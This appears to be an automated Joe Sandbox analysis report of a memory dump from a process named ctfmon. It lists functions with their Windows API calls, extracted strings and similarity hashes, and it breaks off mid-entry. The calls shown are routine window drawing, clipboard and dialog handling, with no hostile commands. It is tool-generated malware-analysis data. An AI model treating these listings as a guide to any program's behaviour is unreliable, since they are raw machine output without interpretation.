Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04f210bc631fba5b5fd9519e44931367e58250411bf8a2553d7fdef40e8ac27b
Instruction ID: 2e254a85d347c2b5898950b2ed43d9309ce3c2e276b75ff7e572e5608014be0a
Opcode Fuzzy Hash: 04f210bc631fba5b5fd9519e44931367e58250411bf8a2553d7fdef40e8ac27b
Instruction Fuzzy Hash: F1813E327142424BDB58CF29ECE152FB793EB9D300B19AA3DD649C7356C934E815CB98

Function 0041E380 Relevance: 55.9, APIs: 37, Instructions: 426windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0041E394
GetParent.USER32(?), ref: 0041E3AD
SetBkMode.GDI32(?,00000002), ref: 0041E3BD
GetClientRect.USER32(?,?), ref: 0041E3CF
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0041E3F7
SelectObject.GDI32(?,00000000), ref: 0041E407

Part of subcall function 0041E040: InflateRect.USER32(?,000000FF,000000FF), ref: 0041E082
Part of subcall function 0041E040: IsWindowEnabled.USER32(?), ref: 0041E095
Part of subcall function 0041E040: InflateRect.USER32(?,000000FF,000000FF), ref: 0041E0BC
Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0D3
Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0EC
Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E104
Part of subcall function 0041E040: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E11E
Part of subcall function 0041E040: SelectObject.GDI32(?,?), ref: 0041E143

GetSysColor.USER32(0000000F), ref: 0041E419
SetBkColor.GDI32(?,00000000), ref: 0041E41D
GetSysColor.USER32(00000012), ref: 0041E425
SetTextColor.GDI32(?,00000000), ref: 0041E429
SendMessageA.USER32(?,00000135,?,?), ref: 0041E43B
SelectObject.GDI32(?,00000000), ref: 0041E443
IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041E468
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E4A0
IsWindowEnabled.USER32(?), ref: 0041E4A7
SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 0041E4BB
GetWindowTextA.USER32(?,?,00000100), ref: 0041E529
SelectObject.GDI32(?,?), ref: 0041E87F
SelectObject.GDI32(?,00000000), ref: 0041E892

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
String ID:
API String ID: 2549663215-0
Opcode ID: 3fd3a575849ad3d1436d3d32659979540c585af791503cc77f23874067242d08
Instruction ID: 6799aca15d36f123e668f58c1c135d1dd851374628879934b92dffa4031545d3
Opcode Fuzzy Hash: 3fd3a575849ad3d1436d3d32659979540c585af791503cc77f23874067242d08
Instruction Fuzzy Hash: D2F12875604301AFD310DF68CC85EAFB7E8FB88704F44492DFA8586250E7B9E945CB5A

Function 0041EBB0 Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 263windowstringCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0041EBBE
SendMessageA.USER32(?,00000157,00000000,00000000), ref: 0041EBEA
HideCaret.USER32(?), ref: 0041EC00
GetWindowRect.USER32(?,?), ref: 0041EC0C
GetParent.USER32(?), ref: 0041EC13
ScreenToClient.USER32(00000000,?), ref: 0041EC27
ScreenToClient.USER32(00000000,?), ref: 0041EC33
GetDC.USER32(00000000), ref: 0041EC36
GetWindowLongA.USER32(?,000000F4), ref: 0041EC68
SendMessageA.USER32(00000000,00001944,00000000,0000029A), ref: 0041EC95
SendMessageA.USER32(00000000,00001943,00000000,0000029A), ref: 0041ECB6
GetClassNameA.USER32(00000000,?,00000010), ref: 0041ECC8
lstrcmpA.KERNEL32(?,ComboBox), ref: 0041ECD8
GetParent.USER32(00000000), ref: 0041ECFC
MapWindowPoints.USER32(00000000,0000029A,?,00000002), ref: 0041ED13
ReleaseDC.USER32(00000000,00000000), ref: 0041ED1B
GetDC.USER32(?), ref: 0041ED26
GetWindowLongA.USER32(00000000,000000F0), ref: 0041ED3C
GetWindow.USER32(00000000,00000005), ref: 0041ED57
GetWindowRect.USER32(00000000,?), ref: 0041ED63
SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 0041EDA0
ReleaseDC.USER32(?,00000000), ref: 0041EDB0
ShowCaret.USER32(?), ref: 0041EDB7
GetSystemMetrics.USER32(00000002), ref: 0041EDF8
GetSystemMetrics.USER32(00000002), ref: 0041EE57
GetSystemMetrics.USER32(00000015), ref: 0041EEA8
ReleaseDC.USER32(00000000,00000000), ref: 0041EECA
ShowCaret.USER32(?), ref: 0041EED8

Strings

ComboBox, xrefs: 0041ECD2

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
String ID: ComboBox
API String ID: 930961256-1152790111
Opcode ID: 095c6ff481106a7ff09be76659a5ce7917ff468ea38e97da75e3ba20c683b7f8
Instruction ID: e5c296bea3933cf44f53e168aaf778f0ec2db8dd84e81f58de9af8b4068f9cfc
Opcode Fuzzy Hash: 095c6ff481106a7ff09be76659a5ce7917ff468ea38e97da75e3ba20c683b7f8
Instruction Fuzzy Hash: C391B571608301AFD320DB25DC89FBF77A8FB85744F40092DFA4196291D778E946CB5A

Function 0041D2C0 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D2CB
GetDC.USER32(00000000), ref: 0041D2D3
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041D2E4
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041D2EB
GetSystemMetrics.USER32(00000001), ref: 0041D309
GetSystemMetrics.USER32(00000000), ref: 0041D314
ReleaseDC.USER32(00000000,00000000), ref: 0041D32A
GlobalAddAtomA.KERNEL32(C3d), ref: 0041D344
LeaveCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D360
GlobalAddAtomA.KERNEL32(C3dNew), ref: 0041D377
GlobalAddAtomA.KERNEL32(C3dL), ref: 0041D389
GlobalAddAtomA.KERNEL32(C3dH), ref: 0041D396
GlobalAddAtomA.KERNEL32(C3dLNew), ref: 0041D3BA
GlobalAddAtomA.KERNEL32(C3dHNew), ref: 0041D3C7
GlobalAddAtomA.KERNEL32(C3dD), ref: 0041D3EB
GetSystemMetrics.USER32(0000002A), ref: 0041D3FE
GetClassInfoA.USER32(00000000,004326E8,?), ref: 0041D441
GetClassInfoA.USER32(00000000,00008002,?), ref: 0041D45E

Strings

C3dH, xrefs: 0041D391
C3dL, xrefs: 0041D384
C3dD, xrefs: 0041D3E6
C3dNew, xrefs: 0041D372
C3d, xrefs: 0041D339
C3dHNew, xrefs: 0041D3C2
C3dLNew, xrefs: 0041D3B5

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
String ID: C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
API String ID: 1233821986-3277416593
Opcode ID: 8c3cc1726dc5f5e07f9ce3bacf8b38420d8711e0c0a32e7e01f5753ca4cfe4ff
Instruction ID: e50427c789af92de44b22dfa043ad602546bc15970a851fe98efa0f61ee8e012
Opcode Fuzzy Hash: 8c3cc1726dc5f5e07f9ce3bacf8b38420d8711e0c0a32e7e01f5753ca4cfe4ff
Instruction Fuzzy Hash: A2410FB8A403047AD720AB54DC817EE37A4BF59358F546037DD00972D0D7BC988D9BAA

Function 004293A5 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 47registryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatW.USER32(Native), ref: 004293C3
RegisterClipboardFormatW.USER32(OwnerLink), ref: 004293CC
RegisterClipboardFormatW.USER32(ObjectLink), ref: 004293D6
RegisterClipboardFormatW.USER32(Embedded Object), ref: 004293E0
RegisterClipboardFormatW.USER32(Embed Source), ref: 004293EA
RegisterClipboardFormatW.USER32(Link Source), ref: 004293F4
RegisterClipboardFormatW.USER32(Object Descriptor), ref: 004293FE
RegisterClipboardFormatW.USER32(Link Source Descriptor), ref: 00429408
RegisterClipboardFormatW.USER32(FileName), ref: 00429412
RegisterClipboardFormatW.USER32(FileNameW), ref: 0042941C
RegisterClipboardFormatW.USER32(Rich Text Format), ref: 00429426
RegisterClipboardFormatW.USER32(RichEdit Text and Objects), ref: 00429430

Strings

Embed Source, xrefs: 004293E2
FileNameW, xrefs: 00429414
Link Source, xrefs: 004293EC
FileName, xrefs: 0042940A
Native, xrefs: 004293BE
Link Source Descriptor, xrefs: 00429400
Embedded Object, xrefs: 004293D8
Rich Text Format, xrefs: 0042941E
Object Descriptor, xrefs: 004293F6
ObjectLink, xrefs: 004293CE
OwnerLink, xrefs: 004293C5
RichEdit Text and Objects, xrefs: 00429428

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: de80afb32674536e2f79b8ce14739d9050ed71d11b05ead950d31be3d13239dd
Instruction ID: edf7ca49e2a083f5ac172aeb54de25137a50422174a6044775e6e6b14afce90a
Opcode Fuzzy Hash: de80afb32674536e2f79b8ce14739d9050ed71d11b05ead950d31be3d13239dd
Instruction Fuzzy Hash: 5C017970B407A45ACB30BF73AC0995BBEE0EEC4B113A24D2FE48597690D6BCA505CF49

Function 0041E040 Relevance: 37.8, APIs: 25, Instructions: 294windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C550: SetBkColor.GDI32(?), ref: 0041C56D
Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5BA
Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5E9
Part of subcall function 0041C550: SetBkColor.GDI32(?,?), ref: 0041C607
Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C632
Part of subcall function 0041C550: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C66C

InflateRect.USER32(?,000000FF,000000FF), ref: 0041E082
IsWindowEnabled.USER32(?), ref: 0041E095
InflateRect.USER32(?,000000FF,000000FF), ref: 0041E0BC
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0D3
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E0EC
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E104
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 0041E11E
SelectObject.GDI32(?,?), ref: 0041E143
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E167
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041E187
SelectObject.GDI32(?,?), ref: 0041E19D
PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 0041E1CB
PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 0041E1EC
InflateRect.USER32(?,000000FF,000000FF), ref: 0041E202
SelectObject.GDI32(?,?), ref: 0041E21C
PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 0041E244
IsWindowEnabled.USER32(?), ref: 0041E24F
SetTextColor.GDI32(?,?), ref: 0041E260
OffsetRect.USER32(?,00000001,00000001), ref: 0041E2EC

Part of subcall function 0041C550: SetBkColor.GDI32(?,00000000), ref: 0041C674

DrawTextA.USER32(?,?,?,?,00000020), ref: 0041E324
GetFocus.USER32 ref: 0041E330
InflateRect.USER32(?,00000001,00000001), ref: 0041E341
IntersectRect.USER32(?,?,?), ref: 0041E352
DrawFocusRect.USER32(?,?), ref: 0041E35E
SelectObject.GDI32(?,00000000), ref: 0041E371

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
String ID:
API String ID: 1611134597-0
Opcode ID: 1e5e9eaf120bb633d1c9d9fb497bf02f089c8a9b78752c289a9debf72a5f20d4
Instruction ID: 85d4594a04ea0c67e496ada25f94dcfd0f64e3c57ddc0f24227d28b8a825e15f
Opcode Fuzzy Hash: 1e5e9eaf120bb633d1c9d9fb497bf02f089c8a9b78752c289a9debf72a5f20d4
Instruction Fuzzy Hash: CBB13875208201AFD310DFA9CD84EAFB7E8FB88708F404A18FA59D2290D775E9858B56

Function 0041E8D0 Relevance: 30.2, APIs: 20, Instructions: 246COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041E915
CallWindowProcA.USER32(00000000), ref: 0041E93D

Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 8efb85a8f10c788bd4c9a0c68f31e7385fb8732264289b1c17e18871f870bad8
Instruction ID: 661fead8de9f1cb923f226e17cd232b8dad460699d7947674ae0cd3bb86e6aba
Opcode Fuzzy Hash: 8efb85a8f10c788bd4c9a0c68f31e7385fb8732264289b1c17e18871f870bad8
Instruction Fuzzy Hash: A361487A7443146BD230AB15EC84FFF375CEF86361F500122FE0092391DA29A98686BE

Function 00405A6D Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(USER32,?,?,?,00405BA6), ref: 00405A8F
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00405AA7
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00405AB8
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00405AC9
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00405ADA
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00405AEB
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00405AFC

Strings

USER32, xrefs: 00405A8A
MonitorFromWindow, xrefs: 00405AB2
MonitorFromRect, xrefs: 00405AC3
GetSystemMetrics, xrefs: 00405AA1
GetMonitorInfoW, xrefs: 00405AF6
EnumDisplayMonitors, xrefs: 00405AE5
MonitorFromPoint, xrefs: 00405AD4

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2547861404
Opcode ID: 441ffe43333a6545924900e7a1cc69255c0b587673d07ec35cb38ca00c6c66c5
Instruction ID: 86978abfdab4202489ccb7ed7906514a54c6f7a5da0540c36e1280f3304fae6d
Opcode Fuzzy Hash: 441ffe43333a6545924900e7a1cc69255c0b587673d07ec35cb38ca00c6c66c5
Instruction Fuzzy Hash: 88110070B10611DBC7515F69BCC3A6BBAF4B6987503A40C3FE109E23D0D778684AEE69

Function 0040C7D1 Relevance: 24.3, APIs: 16, Instructions: 319windowkeyboardCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040C7D6
GetFocus.USER32 ref: 0040C7E4
GetParent.USER32(?), ref: 0040C85A
GetParent.USER32(?), ref: 0040C86A
GetKeyState.USER32(00000012), ref: 0040C920
IsDialogMessageW.USER32(?,?), ref: 0040C9DC
GetFocus.USER32 ref: 0040C9EE
GetFocus.USER32 ref: 0040C9FB
IsWindow.USER32(?), ref: 0040CA13
GetFocus.USER32 ref: 0040CA1F
IsWindow.USER32(?), ref: 0040CA35
GetFocus.USER32 ref: 0040CA3B
GetKeyState.USER32(00000010), ref: 0040CA6C
GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 0040CA8B
MessageBeep.USER32(00000000), ref: 0040CB21

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Focus$MessageParentStateWindow$BeepDialogH_prologItemNext
String ID:
API String ID: 1894107442-0
Opcode ID: 31fd434e58604c9b627ab793c01358e0faa122505644811c941e93cf9aaf4d9d
Instruction ID: 03bd421b11a5e9202270e7a8080601ea4524ec8c7accc3ec12f88eb2ceb1b5eb
Opcode Fuzzy Hash: 31fd434e58604c9b627ab793c01358e0faa122505644811c941e93cf9aaf4d9d
Instruction Fuzzy Hash: C8A1AF71A00219DACF24AB65D8C5BBF7B65EF04355F54423BE801B72E1C738DC429AAD

Function 0041D220 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 44stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00540EE0,76944920,7622B510,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D237
GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 0041D260
lstrcmpiA.KERNEL32(?,kanji), ref: 0041D272
GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 0041D295
lstrcmpiA.KERNEL32(?,hangeul), ref: 0041D2A1
LeaveCriticalSection.KERNEL32(00540EE0,?,?,?,?,?,?,?,?,?,?,?,?,0041C837), ref: 0041D2B3

Strings

kanji, xrefs: 0041D266
kanjimenu, xrefs: 0041D256
roman, xrefs: 0041D251
windows, xrefs: 0041D25B, 0041D290
english, xrefs: 0041D286
hangeulmenu, xrefs: 0041D28B
hangeul, xrefs: 0041D29B

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
API String ID: 1105401458-111014456
Opcode ID: 60bf6964cc79a83cbd7df94c004cbf816ff3b48919ba2be90905dd6c73289552
Instruction ID: 4abe76d66403d63afbfbe3d47ea13df97799fd1973407ab64f2f1cd089386a62
Opcode Fuzzy Hash: 60bf6964cc79a83cbd7df94c004cbf816ff3b48919ba2be90905dd6c73289552
Instruction Fuzzy Hash: E201FC757443857AD210E765EC87FEA3F489769B48F212066F900B2192D2B840588BEE

Function 0042A8BB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 340stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042A8C0
lstrlenA.KERNEL32(?,?,00000000), ref: 0042A8F1

Strings

`DvP?Dv, xrefs: 0042AB02, 0042AC67

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: H_prologlstrlen
String ID: `DvP?Dv
API String ID: 2133942097-2995021381
Opcode ID: 01c58e14bb4e93372598d57a4fe51dd16b9f4830cd3f4e6c793004653f3c11c2
Instruction ID: 50e1f89d1f17318e9a9081ba82e25bfcf0167d2f1df0f58284690d34baa27448
Opcode Fuzzy Hash: 01c58e14bb4e93372598d57a4fe51dd16b9f4830cd3f4e6c793004653f3c11c2
Instruction Fuzzy Hash: DAD1C371E00219DFDF11DF94E980AAEBBB1FF44314F64452AE801A7351D738A961CB5A

Function 0041C290 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 83stringCOMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041C2A9
GetPropA.USER32(?,?), ref: 0041C2BD
GetPropA.USER32(?,?), ref: 0041C2D1
GetPropA.USER32(?,?), ref: 0041C2E5
GetPropA.USER32(?,?), ref: 0041C2F9
GetPropA.USER32(?,?), ref: 0041C309
IsWindowUnicode.USER32(?), ref: 0041C326
GetClassNameA.USER32(?,?,00000010), ref: 0041C338
lstrcmpiA.KERNEL32(?,edit), ref: 0041C348
SetWindowLongA.USER32(?,000000FC,?), ref: 0041C358
SetPropA.USER32(?,?,00000000), ref: 0041C369

Strings

edit, xrefs: 0041C342

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

